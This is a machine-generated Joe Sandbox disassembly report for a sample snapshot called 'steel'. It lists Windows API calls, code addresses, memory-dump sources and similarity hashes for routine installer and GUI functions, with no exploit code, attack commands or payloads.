                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                            • API String ID: 2573145106-3235461205
                                                                                            • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                            • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                            • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                            • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                            • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                            • API String ID: 3478007392-2498399450
                                                                                            • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                            • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                            • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                            • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                            • API String ID: 1782028327-3855017861
                                                                                            • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                            • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                            • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                            • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                            APIs
                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                            • SaveDC.GDI32(?), ref: 00416C83
                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                            • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                            • String ID:
                                                                                            • API String ID: 3808407030-0
                                                                                            • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                            • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                            • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                            • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                            • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                            • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                            • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                            • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                            • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                            • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                            • GetDC.USER32(00000000), ref: 0041BC12
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                            • String ID:
                                                                                            • API String ID: 1095203571-0
                                                                                            • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                            • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                            APIs
                                                                                              • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                            Strings
                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                            • API String ID: 1452528299-4018462623
                                                                                            • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                            • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                            • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                            • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                            • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                            APIs
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                            • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$RealizeSelect$Release
                                                                                            • String ID:
                                                                                            • API String ID: 2261976640-0
                                                                                            • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                            • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                            • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                            • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                            APIs
                                                                                              • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                              • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                              • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                              • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                            • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                              • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                              • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                              • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                              • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                            • String ID: vLB
                                                                                            • API String ID: 1477829881-1797516613
                                                                                            • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                            • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                            • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                            • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                            APIs
                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                            • String ID: Z
                                                                                            • API String ID: 3604996873-1505515367
                                                                                            • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                            • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                            • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                            • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                            APIs
                                                                                            • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$EmptyRect
                                                                                            • String ID:
                                                                                            • API String ID: 182455014-2867612384
                                                                                            • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                            • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                            • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                            • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                            • String ID: ...\
                                                                                            • API String ID: 3133960002-983595016
                                                                                            • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                            • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                            • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                            • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$Move
                                                                                            • String ID: isRS-%.3u.tmp
                                                                                            • API String ID: 3839737484-3657609586
                                                                                            • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                            • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                            • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                            • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                            • API String ID: 1220098344-2970929446
                                                                                            • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                            • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                            • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                            • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                            APIs
